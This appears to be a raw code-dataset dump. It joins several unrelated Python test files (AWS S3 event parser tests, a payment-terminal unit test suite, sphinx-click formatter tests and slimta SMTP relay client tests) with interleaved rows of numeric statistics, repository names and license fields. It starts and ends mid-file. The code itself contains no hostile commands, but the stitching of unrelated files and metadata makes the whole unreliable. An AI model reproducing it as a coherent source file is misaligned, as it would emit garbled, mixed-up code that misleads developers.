    assert record.eventVersion == "2.1"
    assert record.eventSource == "aws:s3"
    assert record.awsRegion == "us-east-2"
    # eventTime is parsed to a datetime; compare as epoch milliseconds.
    convert_time = int(round(record.eventTime.timestamp() * 1000))
    assert convert_time == 1567539447192
    assert record.eventName == "ObjectCreated:Put"
    user_identity = record.userIdentity
    assert user_identity.principalId == "AWS:AIDAINPONIXQXHT3IKHL2"
    request_parameters = record.requestParameters
    # sourceIPAddress is a network-address type; compare its string form.
    assert str(request_parameters.sourceIPAddress) == "205.255.255.255/32"
    assert record.responseElements.x_amz_request_id == "D82B88E5F771F645"
    assert (
        record.responseElements.x_amz_id_2
        == "vlR7PnpV2Ce81l0PRw6jlUpck7Jo5ZsQjryTjKlc5aLWGVHPZLj5NeC6qMa0emYBDXOo6QBU0Wo="
    )
    s3 = record.s3
    assert s3.s3SchemaVersion == "1.0"
    assert s3.configurationId == "828aa6fc-f7b5-4305-8584-487c791949c1"
    bucket = s3.bucket
    assert bucket.name == "lambda-artifacts-deafc19498e3f2df"
    assert bucket.ownerIdentity.principalId == "A3I5XTEXAMAI3E"
    assert bucket.arn == "arn:aws:s3:::lambda-artifacts-deafc19498e3f2df"
    assert s3.object.key == "b21b84d653bb07b05b1e6b33684dc11b"
    assert s3.object.size == 1305107
    assert s3.object.eTag == "b21b84d653bb07b05b1e6b33684dc11b"
    assert s3.object.versionId is None
    assert s3.object.sequencer == "0C0F6F405D6ED209E1"


@event_parser(model=S3Model)
def handle_s3(event: S3Model, _: LambdaContext):
    """Validate a parsed standard S3 event; it must carry no Glacier data."""
    records = list(event.Records)
    assert len(records) == 1
    record: S3RecordModel = records[0]
    _assert_common_s3_record(record)
    assert record.glacierEventData is None


@event_parser(model=S3Model)
def handle_s3_glacier(event: S3Model, _: LambdaContext):
    """Validate a parsed S3 event that carries Glacier restore data."""
    records = list(event.Records)
    assert len(records) == 1
    record: S3RecordModel = records[0]
    _assert_common_s3_record(record)
    assert record.glacierEventData is not None
    # Restore-expiry time is also a datetime; compare as epoch milliseconds.
    convert_time = int(
        round(record.glacierEventData.restoreEventData.lifecycleRestorationExpiryTime.timestamp() * 1000)
    )
    assert convert_time == 60000
    assert record.glacierEventData.restoreEventData.lifecycleRestoreStorageClass == "standard"
def test_s3_trigger_event():
    """Parse the standard S3 Put fixture through the asserting handler."""
    handle_s3(load_event("s3Event.json"), LambdaContext())
def test_s3_glacier_trigger_event():
    """Parse the S3 Glacier-restore fixture through the asserting handler."""
    handle_s3_glacier(load_event("s3EventGlacier.json"), LambdaContext())
| 43.955556
| 105
| 0.752528
| 421
| 3,956
| 6.935867
| 0.244656
| 0.061644
| 0.047945
| 0.039726
| 0.861301
| 0.831507
| 0.784932
| 0.761644
| 0.761644
| 0.761644
| 0
| 0.113224
| 0.149393
| 3,956
| 89
| 106
| 44.449438
| 0.754532
| 0
| 0
| 0.740741
| 0
| 0
| 0.203994
| 0.141557
| 0
| 0
| 0
| 0
| 0.54321
| 1
| 0.049383
| false
| 0
| 0.049383
| 0
| 0.098765
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5d912ba580ad2f966b87eb1035da93bc87a2fbf7
| 143
|
py
|
Python
|
__init__.py
|
Danielmaj/NLP_hw4
|
7762cbb4e2db131d97351a5f5cc066f48c9f02bb
|
[
"MIT"
] | null | null | null |
__init__.py
|
Danielmaj/NLP_hw4
|
7762cbb4e2db131d97351a5f5cc066f48c9f02bb
|
[
"MIT"
] | null | null | null |
__init__.py
|
Danielmaj/NLP_hw4
|
7762cbb4e2db131d97351a5f5cc066f48c9f02bb
|
[
"MIT"
] | null | null | null |
# pylint: disable=wildcard-import
from my_library.dataset_readers import *
from my_library.models import *
from my_library.predictors import *
| 28.6
| 40
| 0.825175
| 20
| 143
| 5.7
| 0.55
| 0.263158
| 0.315789
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104895
| 143
| 4
| 41
| 35.75
| 0.890625
| 0.216783
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
5dd40b49e84477e27f1b1f0e593d072f76d11820
| 6,671
|
py
|
Python
|
laskarit/viikko2/unicafe/src/tests/kassapaate_test.py
|
miikara/landlord
|
1f9a2ae2485adb8837a9b1d0668cc0708aec4d5f
|
[
"MIT"
] | null | null | null |
laskarit/viikko2/unicafe/src/tests/kassapaate_test.py
|
miikara/landlord
|
1f9a2ae2485adb8837a9b1d0668cc0708aec4d5f
|
[
"MIT"
] | null | null | null |
laskarit/viikko2/unicafe/src/tests/kassapaate_test.py
|
miikara/landlord
|
1f9a2ae2485adb8837a9b1d0668cc0708aec4d5f
|
[
"MIT"
] | null | null | null |
import unittest
from kassapaate import Kassapaate
from maksukortti import Maksukortti
class TestKassapaate(unittest.TestCase):
    """Tests for the Kassapaate (cafeteria payment terminal) class.

    All amounts are in cents. From the assertions below: a fresh terminal
    holds 100000, a cheap ("edullinen") lunch costs 240 and a tasty
    ("maukas") lunch costs 400.
    """

    def setUp(self):
        # Fresh terminal plus a card loaded with 1000 cents ("saldo: 10.0").
        self.kassapaate = Kassapaate()
        self.maksukortti = Maksukortti(1000)

    def test_luodun_paatteen_saldo_oikein(self):
        """A new terminal starts with 100000 cents in the till."""
        balance = self.kassapaate.kassassa_rahaa
        self.assertEqual(balance, 100000)

    def test_luodun_paatteen_myynti_oikein(self):
        """A new terminal has sold zero lunches of either kind."""
        sales = self.kassapaate.edulliset + self.kassapaate.maukkaat
        self.assertEqual(sales, 0)

    def test_edullisen_myynti_kateisella_kasvattaa_myyntia(self):
        """A sufficient cash payment increments the cheap-lunch counter."""
        self.kassapaate.syo_edullisesti_kateisella(1000)
        self.assertEqual(self.kassapaate.edulliset, 1)

    def test_edullisen_myynti_ei_kasvata_myyntia_kun_raha_ei_riita(self):
        """Insufficient cash leaves the cheap-lunch counter untouched."""
        self.kassapaate.syo_edullisesti_kateisella(10)
        self.assertEqual(self.kassapaate.edulliset, 0)

    def test_edullisen_myynti_kateisella_kasvattaa_kassaa(self):
        """A cash sale adds the lunch price (240) to the till."""
        self.kassapaate.syo_edullisesti_kateisella(1000)
        self.assertEqual(self.kassapaate.kassassa_rahaa, 100240)

    def test_edullisen_myynti_ei_kasvata_kassaa_kun_raha_ei_riita(self):
        """Insufficient cash leaves the till unchanged."""
        self.kassapaate.syo_edullisesti_kateisella(10)
        self.assertEqual(self.kassapaate.kassassa_rahaa, 100000)

    def test_edullisen_myynti_kateisella_vaihtoraha_oikein(self):
        """Change is payment minus price: 250 - 240 == 10."""
        change = self.kassapaate.syo_edullisesti_kateisella(250)
        self.assertEqual(change, 10)

    def test_edullisen_myynti_kateisella_vaihtoraha_kun_raha_ei_riita(self):
        """Insufficient cash is returned in full."""
        change = self.kassapaate.syo_edullisesti_kateisella(230)
        self.assertEqual(change, 230)

    def test_maukkaan_myynti_kateisella_kasvattaa_myyntia(self):
        """A sufficient cash payment increments the tasty-lunch counter."""
        self.kassapaate.syo_maukkaasti_kateisella(2000)
        self.assertEqual(self.kassapaate.maukkaat, 1)

    def test_maukkaan_myynti_ei_kasvata_myyntia_kun_raha_ei_riita(self):
        """Insufficient cash leaves the tasty-lunch counter untouched."""
        self.kassapaate.syo_maukkaasti_kateisella(10)
        self.assertEqual(self.kassapaate.maukkaat, 0)

    def test_maukkaan_myynti_kateisella_kasvattaa_kassaa(self):
        """A cash sale adds the lunch price (400) to the till."""
        self.kassapaate.syo_maukkaasti_kateisella(2000)
        self.assertEqual(self.kassapaate.kassassa_rahaa, 100400)

    def test_maukkaan_myynti_ei_kasvata_kassaa_kun_raha_ei_riita(self):
        """Insufficient cash leaves the till unchanged."""
        self.kassapaate.syo_maukkaasti_kateisella(10)
        self.assertEqual(self.kassapaate.kassassa_rahaa, 100000)

    def test_maukkaan_myynti_kateisella_vaihtoraha_oikein(self):
        """Change is payment minus price: 410 - 400 == 10."""
        change = self.kassapaate.syo_maukkaasti_kateisella(410)
        self.assertEqual(change, 10)

    def test_maukkaan_myynti_kateisella_vaihtoraha_kun_raha_ei_riita(self):
        """Insufficient cash is returned in full."""
        change = self.kassapaate.syo_maukkaasti_kateisella(230)
        self.assertEqual(change, 230)

    # Card payments: cheap lunch
    def test_edullisen_myynti_kortilla_ei_muuta_kassaa(self):
        """Card payments never change the cash in the till."""
        self.kassapaate.syo_edullisesti_kortilla(self.maksukortti)
        balance = self.kassapaate.kassassa_rahaa
        self.assertEqual(balance, 100000)

    def test_edullisen_myynti_kortilla_kasvattaa_myyntia(self):
        """A successful card sale increments the cheap-lunch counter."""
        self.kassapaate.syo_edullisesti_kortilla(self.maksukortti)
        self.assertEqual(self.kassapaate.edulliset, 1)

    def test_edullisen_myynti_kortilla_ei_kasvata_myyntia_kun_raha_ei_riita(self):
        """A card without funds does not increment the counter."""
        maksukortti_low_balance = Maksukortti(1)
        self.kassapaate.syo_edullisesti_kortilla(maksukortti_low_balance)
        self.assertEqual(self.kassapaate.edulliset, 0)

    def test_edullisen_myynti_kortilla_veloitetaan_kortilta(self):
        """The lunch price is debited from the card: 1000 - 240 -> 'saldo: 7.6'."""
        self.kassapaate.syo_edullisesti_kortilla(self.maksukortti)
        self.assertEqual(str(self.maksukortti), "saldo: 7.6")

    def test_edullisen_myynti_kortilla_ei_veloitusta_kun_raha_ei_riita(self):
        """A card without funds is not debited."""
        maksukortti_low_balance = Maksukortti(1)
        self.kassapaate.syo_edullisesti_kortilla(maksukortti_low_balance)
        # NOTE(review): this asserts the untouched setUp card, which is trivially
        # unchanged; it should probably assert maksukortti_low_balance instead.
        # Confirm Maksukortti's str() format for a 1-cent balance before changing.
        self.assertEqual(str(self.maksukortti), "saldo: 10.0")

    def test_edullisen_myynti_kortilla_palautusarvo(self):
        """A successful card sale returns True."""
        return_value = self.kassapaate.syo_edullisesti_kortilla(self.maksukortti)
        self.assertEqual(return_value, True)

    def test_edullisen_myynti_kortilla_palautusarvo_kun_raha_ei_riita(self):
        """A failed card sale returns False."""
        maksukortti_low_balance = Maksukortti(1)
        return_value = self.kassapaate.syo_edullisesti_kortilla(maksukortti_low_balance)
        self.assertEqual(return_value, False)

    # Card payments: tasty lunch
    def test_maukkaan_myynti_kortilla_ei_muuta_kassaa(self):
        """Card payments never change the cash in the till."""
        self.kassapaate.syo_maukkaasti_kortilla(self.maksukortti)
        balance = self.kassapaate.kassassa_rahaa
        self.assertEqual(balance, 100000)

    def test_maukkaan_myynti_kortilla_kasvattaa_myyntia(self):
        """A successful card sale increments the tasty-lunch counter."""
        self.kassapaate.syo_maukkaasti_kortilla(self.maksukortti)
        self.assertEqual(self.kassapaate.maukkaat, 1)

    def test_maukkaan_myynti_kortilla_ei_kasvata_myyntia_kun_raha_ei_riita(self):
        """A card without funds does not increment the counter."""
        maksukortti_low_balance = Maksukortti(1)
        self.kassapaate.syo_maukkaasti_kortilla(maksukortti_low_balance)
        self.assertEqual(self.kassapaate.maukkaat, 0)

    def test_maukkaan_myynti_kortilla_veloitetaan_kortilta(self):
        """The lunch price is debited from the card: 1000 - 400 -> 'saldo: 6.0'."""
        self.kassapaate.syo_maukkaasti_kortilla(self.maksukortti)
        self.assertEqual(str(self.maksukortti), "saldo: 6.0")

    def test_maukkaan_myynti_kortilla_ei_veloitusta_kun_raha_ei_riita(self):
        """A card without funds is not debited."""
        maksukortti_low_balance = Maksukortti(1)
        self.kassapaate.syo_maukkaasti_kortilla(maksukortti_low_balance)
        # NOTE(review): same issue as the edullinen variant above — this asserts
        # the untouched setUp card rather than the card that was charged.
        self.assertEqual(str(self.maksukortti), "saldo: 10.0")

    def test_maukkaan_myynti_kortilla_palautusarvo(self):
        """A successful card sale returns True."""
        return_value = self.kassapaate.syo_maukkaasti_kortilla(self.maksukortti)
        self.assertEqual(return_value, True)

    def test_maukkaan_myynti_kortilla_palautusarvo_kun_raha_ei_riita(self):
        """A failed card sale returns False."""
        maksukortti_low_balance = Maksukortti(1)
        return_value = self.kassapaate.syo_maukkaasti_kortilla(maksukortti_low_balance)
        self.assertEqual(return_value, False)

    # Loading money onto a card
    def test_kortin_lataus_kasvattaa_kassaa(self):
        """Loading 1000 cents onto a card adds 1000 to the till."""
        maksukortti_temp = Maksukortti(1000)
        self.kassapaate.lataa_rahaa_kortille(maksukortti_temp, 1000)
        balance = self.kassapaate.kassassa_rahaa
        self.assertEqual(balance, 101000)

    def test_kortin_lataus_siirtyy_kortille(self):
        """The loaded amount appears on the card: 1000 + 1000 -> 'saldo: 20.0'."""
        maksukortti_temp = Maksukortti(1000)
        self.kassapaate.lataa_rahaa_kortille(maksukortti_temp, 1000)
        self.assertEqual(str(maksukortti_temp), "saldo: 20.0")

    def test_negatiivinen_lataus_kortille(self):
        """A negative load must leave the card balance unchanged."""
        maksukortti_temp = Maksukortti(1000)
        # The return value was previously bound to an unused local; only the
        # card balance is asserted, so call without binding.
        self.kassapaate.lataa_rahaa_kortille(maksukortti_temp, -500)
        self.assertEqual(str(maksukortti_temp), "saldo: 10.0")
| 43.03871
| 88
| 0.76945
| 781
| 6,671
| 6.185659
| 0.101152
| 0.139102
| 0.091492
| 0.060857
| 0.899193
| 0.895674
| 0.803974
| 0.773753
| 0.710619
| 0.621817
| 0
| 0.02707
| 0.158297
| 6,671
| 154
| 89
| 43.318182
| 0.833304
| 0.007045
| 0
| 0.5
| 0
| 0
| 0.009674
| 0
| 0
| 0
| 0
| 0
| 0.276786
| 1
| 0.285714
| false
| 0
| 0.026786
| 0
| 0.321429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b908798999c7329290d0358d6b38412fb7991b04
| 9,720
|
py
|
Python
|
tests/test_formatter.py
|
james-ennis/sphinx-click
|
b5e5f89808b11fc2c0bcec180f0c9bf96f04f7e0
|
[
"MIT"
] | null | null | null |
tests/test_formatter.py
|
james-ennis/sphinx-click
|
b5e5f89808b11fc2c0bcec180f0c9bf96f04f7e0
|
[
"MIT"
] | null | null | null |
tests/test_formatter.py
|
james-ennis/sphinx-click
|
b5e5f89808b11fc2c0bcec180f0c9bf96f04f7e0
|
[
"MIT"
] | null | null | null |
import textwrap
import unittest
import click
from sphinx_click import ext
class CommandTestCase(unittest.TestCase):
    # Formatting of a single click.Command by ext._format_command.
    # NOTE(review): the expected-output string literals below appear to have
    # lost blank lines/indentation during extraction — verify their exact
    # contents against upstream before editing them.

    def test_no_parameters(self):
        """Validate a `click.Command` with no parameters.
        This exercises the code paths for a command with *no* arguments, *no*
        options and *no* environment variables.
        """
        @click.command()
        def foobar():
            """A sample command."""
            pass
        ctx = click.Context(foobar, info_name='foobar')
        output = list(ext._format_command(ctx, show_nested=False))
        # Only program name and usage are emitted; no Options/Arguments rubrics.
        self.assertEqual(
            textwrap.dedent("""
            A sample command.
            .. program:: foobar
            .. code-block:: shell
            foobar [OPTIONS]
            """).lstrip(), '\n'.join(output))

    def test_basic_parameters(self):
        """Validate a combination of parameters.
        This exercises the code paths for a command with arguments, options and
        environment variables.
        """
        @click.command()
        @click.option('--param', envvar='PARAM', help='A sample option')
        @click.argument('ARG', envvar='ARG')
        def foobar(bar):
            """A sample command."""
            pass
        ctx = click.Context(foobar, info_name='foobar')
        output = list(ext._format_command(ctx, show_nested=False))
        # Options, arguments and the envvar cross-references are all rendered.
        self.assertEqual(
            textwrap.dedent("""
            A sample command.
            .. program:: foobar
            .. code-block:: shell
            foobar [OPTIONS] ARG
            .. rubric:: Options
            .. option:: --param <param>
            A sample option
            .. rubric:: Arguments
            .. option:: ARG
            Required argument
            .. rubric:: Environment variables
            .. _foobar-param-PARAM:
            .. envvar:: PARAM
            :noindex:
            Provide a default for :option:`--param`
            .. _foobar-arg-ARG:
            .. envvar:: ARG
            :noindex:
            Provide a default for :option:`ARG`
            """).lstrip(), '\n'.join(output))

    @unittest.skipIf(ext.CLICK_VERSION < (7, 0),
                     'The hidden flag was added in Click 7.0')
    def test_hidden(self):
        """Validate a `click.Command` with the `hidden` flag."""
        @click.command(hidden=True)
        def foobar():
            """A sample command."""
            pass
        ctx = click.Context(foobar, info_name='foobar')
        output = list(ext._format_command(ctx, show_nested=False))
        # Hidden commands produce no output at all.
        self.assertEqual('', '\n'.join(output))
class GroupTestCase(unittest.TestCase):
    # Formatting of a click.Group by ext._format_command.
    # NOTE(review): the expected-output string literals below appear to have
    # lost blank lines/indentation during extraction — verify their exact
    # contents against upstream before editing them.

    def test_no_parameters(self):
        """Validate a `click.Group` with no parameters.
        This exercises the code paths for a group with *no* arguments, *no*
        options and *no* environment variables.
        """
        @click.group()
        def cli():
            """A sample command group."""
            pass
        ctx = click.Context(cli, info_name='cli')
        output = list(ext._format_command(ctx, show_nested=False))
        # Groups show the COMMAND [ARGS]... placeholder in the usage line.
        self.assertEqual(
            textwrap.dedent("""
            A sample command group.
            .. program:: cli
            .. code-block:: shell
            cli [OPTIONS] COMMAND [ARGS]...
            """).lstrip(), '\n'.join(output))

    def test_basic_parameters(self):
        """Validate a combination of parameters.
        This exercises the code paths for a group with arguments, options and
        environment variables.
        """
        @click.group()
        @click.option('--param', envvar='PARAM', help='A sample option')
        @click.argument('ARG', envvar='ARG')
        def cli():
            """A sample command group."""
            pass
        ctx = click.Context(cli, info_name='cli')
        output = list(ext._format_command(ctx, show_nested=False))
        self.assertEqual(
            textwrap.dedent("""
            A sample command group.
            .. program:: cli
            .. code-block:: shell
            cli [OPTIONS] ARG COMMAND [ARGS]...
            .. rubric:: Options
            .. option:: --param <param>
            A sample option
            .. rubric:: Arguments
            .. option:: ARG
            Required argument
            .. rubric:: Environment variables
            .. _cli-param-PARAM:
            .. envvar:: PARAM
            :noindex:
            Provide a default for :option:`--param`
            .. _cli-arg-ARG:
            .. envvar:: ARG
            :noindex:
            Provide a default for :option:`ARG`
            """).lstrip(), '\n'.join(output))

    def test_no_line_wrapping(self):
        r"""Validate behavior when a \b character is present.
        https://click.palletsprojects.com/en/7.x/documentation/#preventing-rewrapping
        """
        @click.group()
        def cli():
            """A sample command group.
            \b
            This is
            a paragraph
            without rewrapping.
            And this is a paragraph
            that will be rewrapped again.
            """
            pass
        ctx = click.Context(cli, info_name='cli')
        output = list(ext._format_command(ctx, show_nested=False))
        # The \b-marked paragraph is rendered as an rST line block ("| ...").
        self.assertEqual(
            textwrap.dedent("""
            A sample command group.
            | This is
            | a paragraph
            | without rewrapping.
            And this is a paragraph
            that will be rewrapped again.
            .. program:: cli
            .. code-block:: shell
            cli [OPTIONS] COMMAND [ARGS]...
            """).lstrip(), '\n'.join(output))
class NestedCommandsTestCase(unittest.TestCase):
    # Behavior of the show_nested flag for groups with sub-commands.
    # NOTE(review): expected-output literals may have lost blank lines during
    # extraction — verify against upstream before editing them.

    @staticmethod
    def _get_ctx():
        # Build a group with a single sub-command and return its Context.
        @click.group()
        def cli():
            """A sample command group."""
            pass
        @cli.command()
        def hello():
            """A sample command."""
            pass
        return click.Context(cli, info_name='cli')

    def test_hide_nested(self):
        """Validate a nested command without show_nested.
        If we're not showing sub-commands separately, we should list them.
        """
        ctx = self._get_ctx()
        output = list(ext._format_command(ctx, show_nested=False))
        self.assertEqual(
            textwrap.dedent("""
            A sample command group.
            .. program:: cli
            .. code-block:: shell
            cli [OPTIONS] COMMAND [ARGS]...
            .. rubric:: Commands
            .. object:: hello
            A sample command.
            """).lstrip(), '\n'.join(output))

    def test_show_nested(self):
        """Validate a nested command with show_nested.
        If we're not showing sub-commands separately, we should not list them.
        """
        ctx = self._get_ctx()
        output = list(ext._format_command(ctx, show_nested=True))
        # With show_nested=True the Commands rubric is omitted here.
        self.assertEqual(
            textwrap.dedent("""
            A sample command group.
            .. program:: cli
            .. code-block:: shell
            cli [OPTIONS] COMMAND [ARGS]...
            """).lstrip(), '\n'.join(output))
class CommandFilterTestCase(unittest.TestCase):
    # Behavior of the commands= filter: selection and ordering of sub-commands.
    # NOTE(review): expected-output literals may have lost blank lines during
    # extraction — verify against upstream before editing them.

    @staticmethod
    def _get_ctx():
        # Build a group with two sub-commands ('hello', 'world') and return its Context.
        @click.group()
        def cli():
            """A sample command group."""
        @cli.command()
        def hello():
            """A sample command."""
        @cli.command()
        def world():
            """A world command."""
        return click.Context(cli, info_name='cli')

    def test_no_commands(self):
        """Validate an empty command group."""
        ctx = self._get_ctx()
        # commands='' filters out every sub-command.
        output = list(ext._format_command(ctx, show_nested=False, commands=''))
        self.assertEqual(
            textwrap.dedent("""
            A sample command group.
            .. program:: cli
            .. code-block:: shell
            cli [OPTIONS] COMMAND [ARGS]...
            """).lstrip(), '\n'.join(output))

    def test_order_of_commands(self):
        """Validate the order of commands."""
        ctx = self._get_ctx()
        # The comma-separated list dictates output order: world before hello.
        output = list(ext._format_command(ctx, show_nested=False,
                                          commands='world, hello'))
        self.assertEqual(
            textwrap.dedent("""
            A sample command group.
            .. program:: cli
            .. code-block:: shell
            cli [OPTIONS] COMMAND [ARGS]...
            .. rubric:: Commands
            .. object:: world
            A world command.
            .. object:: hello
            A sample command.
            """).lstrip(), '\n'.join(output))
class CustomMultiCommandTestCase(unittest.TestCase):
    # Sub-command extraction from a user-defined click.MultiCommand subclass.
    # NOTE(review): expected-output literals may have lost blank lines during
    # extraction — verify against upstream before editing them.

    def test_basics(self):
        """Validate a custom ``click.MultiCommand`` with no parameters.
        This exercises the code paths to extract commands correctly from these
        commands.
        """
        @click.command()
        def hello():
            """A sample command."""
        @click.command()
        def world():
            """A world command."""

        class MyCLI(click.MultiCommand):
            # Minimal MultiCommand: fixed name->command mapping.
            _command_mapping = {
                'hello': hello,
                'world': world,
            }
            def list_commands(self, ctx):
                return ['hello', 'world']
            def get_command(self, ctx, name):
                return self._command_mapping[name]

        cli = MyCLI(help='A sample custom multicommand.')
        ctx = click.Context(cli, info_name='cli')
        output = list(ext._format_command(ctx, show_nested=False))
        self.assertEqual(
            textwrap.dedent("""
            A sample custom multicommand.
            .. program:: cli
            .. code-block:: shell
            cli [OPTIONS] COMMAND [ARGS]...
            .. rubric:: Commands
            .. object:: hello
            A sample command.
            .. object:: world
            A world command.
            """).lstrip(), '\n'.join(output))
| 24.360902
| 85
| 0.535185
| 1,002
| 9,720
| 5.101796
| 0.135729
| 0.03971
| 0.062989
| 0.044601
| 0.816901
| 0.804382
| 0.765454
| 0.73572
| 0.720853
| 0.692293
| 0
| 0.000779
| 0.339609
| 9,720
| 398
| 86
| 24.422111
| 0.795607
| 0.160082
| 0
| 0.776256
| 0
| 0
| 0.398535
| 0
| 0
| 0
| 0
| 0
| 0.050228
| 1
| 0.127854
| false
| 0.03653
| 0.018265
| 0.009132
| 0.191781
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f8d8188be5011283a6e1b6267c00ec79002894e2
| 22,492
|
py
|
Python
|
test/test_slimta_relay_smtp_client.py
|
fisele/compare-slimta
|
4a59bd8e0d0b01551ed6d045b7e008846c8b4a80
|
[
"MIT"
] | null | null | null |
test/test_slimta_relay_smtp_client.py
|
fisele/compare-slimta
|
4a59bd8e0d0b01551ed6d045b7e008846c8b4a80
|
[
"MIT"
] | null | null | null |
test/test_slimta_relay_smtp_client.py
|
fisele/compare-slimta
|
4a59bd8e0d0b01551ed6d045b7e008846c8b4a80
|
[
"MIT"
] | null | null | null |
from email.encoders import encode_base64
import unittest
from mox3.mox import MoxTestBase, IsA
from gevent import Timeout
from gevent.socket import socket, error as socket_error
from gevent.ssl import SSLContext
from gevent.event import AsyncResult
from slimta.util import pycompat
from slimta.util.deque import BlockingDeque
from slimta.smtp import ConnectionLost, SmtpError
from slimta.smtp.reply import Reply
from slimta.relay import TransientRelayError, PermanentRelayError
from slimta.relay.smtp.client import SmtpRelayClient
from slimta.envelope import Envelope
class TestSmtpRelayClient(MoxTestBase, unittest.TestCase):
def setUp(self):
    """Create the mock socket, delivery queue and SSL context used by every test."""
    super(TestSmtpRelayClient, self).setUp()
    self.sock = self.mox.CreateMock(socket)
    self.sock.fileno = lambda: -1
    self.sock.getpeername = lambda: ('test', 0)
    self.queue = self.mox.CreateMock(BlockingDeque)
    self.context = self.mox.CreateMock(SSLContext)
    self.context.session_stats = lambda: {}
def _socket_creator(self, address):
    """Stand-in socket-creator hook: always hand back the mock socket."""
    return self.sock
def test_connect(self):
    """_connect() obtains its socket via the injected socket_creator."""
    self.mox.ReplayAll()
    client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator)
    client._connect()
def test_banner(self):
    """_banner() accepts a 220 greeting and raises TransientRelayError on 420."""
    self.sock.recv(IsA(int)).AndReturn(b'220 Welcome\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'420 Not Welcome\r\n')
    self.mox.ReplayAll()
    client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator)
    client._connect()
    client._banner()
    with self.assertRaises(TransientRelayError):
        client._banner()
def test_ehlo(self):
    """_ehlo() sends EHLO with the configured identity; 420 raises TransientRelayError."""
    self.sock.sendall(b'EHLO there\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 TEST\r\n')
    self.sock.sendall(b'EHLO there\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'420 Goodbye\r\n')
    self.mox.ReplayAll()
    client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, ehlo_as='there')
    client._connect()
    client._ehlo()
    with self.assertRaises(TransientRelayError):
        client._ehlo()
def test_starttls(self):
    """_starttls() wraps the socket after 220; a 420 reply raises TransientRelayError."""
    self.sock.sendall(b'STARTTLS\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'220 Go ahead\r\n')
    self.context.wrap_socket(self.sock, server_hostname='addr').AndReturn(self.sock)
    self.sock.sendall(b'STARTTLS\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'420 Stop\r\n')
    self.mox.ReplayAll()
    client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, context=self.context, tls_required=True)
    client._connect()
    client._starttls()
    with self.assertRaises(TransientRelayError):
        client._starttls()
def test_handshake_tls_immediately(self):
    """With tls_immediately the socket is TLS-wrapped before banner and EHLO."""
    self.context.wrap_socket(self.sock, server_hostname='addr').AndReturn(self.sock)
    self.sock.recv(IsA(int)).AndReturn(b'220 Welcome\r\n')
    self.sock.sendall(b'EHLO there\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250 Hello\r\n')
    self.mox.ReplayAll()
    client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, context=self.context, tls_immediately=True, ehlo_as='there')
    client._connect()
    client._handshake()
def test_handshake_starttls(self):
    """Handshake issues STARTTLS when the server advertises it, then re-EHLOs over TLS."""
    self.sock.recv(IsA(int)).AndReturn(b'220 Welcome\r\n')
    self.sock.sendall(b'EHLO there\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 STARTTLS\r\n')
    self.sock.sendall(b'STARTTLS\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'220 Go ahead\r\n')
    self.context.wrap_socket(self.sock, server_hostname='addr').AndReturn(self.sock)
    self.sock.sendall(b'EHLO there\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250 Hello\r\n')
    self.mox.ReplayAll()
    client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, context=self.context, ehlo_as='there')
    client._connect()
    client._handshake()
def test_handshake_authenticate(self):
    """Handshake sends AUTH PLAIN when advertised and credentials are configured."""
    self.sock.recv(IsA(int)).AndReturn(b'220 Welcome\r\n')
    self.sock.sendall(b'EHLO there\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 AUTH PLAIN\r\n')
    # Base64 of the SASL PLAIN string b'\x00test@example.com\x00passwd'.
    self.sock.sendall(b'AUTH PLAIN AHRlc3RAZXhhbXBsZS5jb20AcGFzc3dk\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'235 Ok\r\n')
    self.mox.ReplayAll()
    client = SmtpRelayClient(('addr', 0), self.queue, socket_creator=self._socket_creator, credentials=('test@example.com', 'passwd'), ehlo_as='there')
    client._connect()
    client._handshake()
def test_handshake_authenticate_callable(self):
    """credentials may be a callable that yields the username then the password."""
    self.sock.recv(IsA(int)).AndReturn(b'220 Welcome\r\n')
    self.sock.sendall(b'EHLO there\r\n')
    self.sock.recv(IsA(int)).AndReturn(b'250-Hello\r\n250 AUTH PLAIN\r\n')
    # Same AUTH PLAIN payload as the tuple-credentials test.
    self.sock.sendall(b'AUTH PLAIN AHRlc3RAZXhhbXBsZS5jb20AcGFzc3dk\r\n')
